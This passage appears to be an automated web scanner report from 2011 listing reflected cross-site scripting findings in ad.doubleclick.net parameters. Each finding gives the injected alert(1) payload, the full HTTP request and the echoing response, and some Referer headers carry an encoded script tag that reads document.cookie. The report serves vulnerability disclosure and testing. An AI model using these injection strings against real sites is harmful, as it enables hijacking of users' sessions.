GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc9d4'-alert(1)-'8d9112ba486 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5885
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55862'-alert(1)-'5c8556f2836 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:02 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=8455862'-alert(1)-'5c8556f2836&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\"> ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aec3"-alert(1)-"b8c1ebf1bd1 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:58 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=844aec3"-alert(1)-"b8c1ebf1bd1&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19f04'-alert(1)-'18424983c20 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=10813419f04'-alert(1)-'18424983c20&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\"> ...[SNIP]...
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd73e"-alert(1)-"c148583078f was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:50 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134fd73e"-alert(1)-"c148583078f&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "op ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e22"-alert(1)-"740480bcef9 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f1e22"-alert(1)-"740480bcef9&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; ...[SNIP]...
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef59'-alert(1)-'24e894d3194 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:28:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bef59'-alert(1)-'24e894d3194&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\"> ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bc0b"-alert(1)-"ee4b25273ee was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273ee HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5908 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:28:16 GMT Expires: Mon, 07 Feb 2011 02:28:16 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=5bc0b"-alert(1)-"ee4b25273eehttp%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b432f'-alert(1)-'0eb20d682e8 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5908 Cache-Control: no-cache Pragma: no-cache Date: Mon, 07 Feb 2011 02:28:20 GMT Expires: Mon, 07 Feb 2011 02:28:20 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=58348799077260653&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=b432f'-alert(1)-'0eb20d682e8http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18aaa'-alert(1)-'1667d1ce1b1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 20:32:44 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/v%3B235160821%3B0-0%3B0%3B59013435%3B3454-728/90%3B40328572/40346359/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=5834879907726065318aaa'-alert(1)-'1667d1ce1b1&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.clearskinresolution.com/%3Fuid%3DBN1_PSD1_CSR\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 132c3"-alert(1)-"27b6307f1fc was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N6275.282079.EURORSCGEDGE/B4767814.55;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=58348799077260653132c3"-alert(1)-"27b6307f1fc&mt_id=108134&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=58348799077260653? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045650111&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F24 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 07 Feb 2011 02:27:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5908
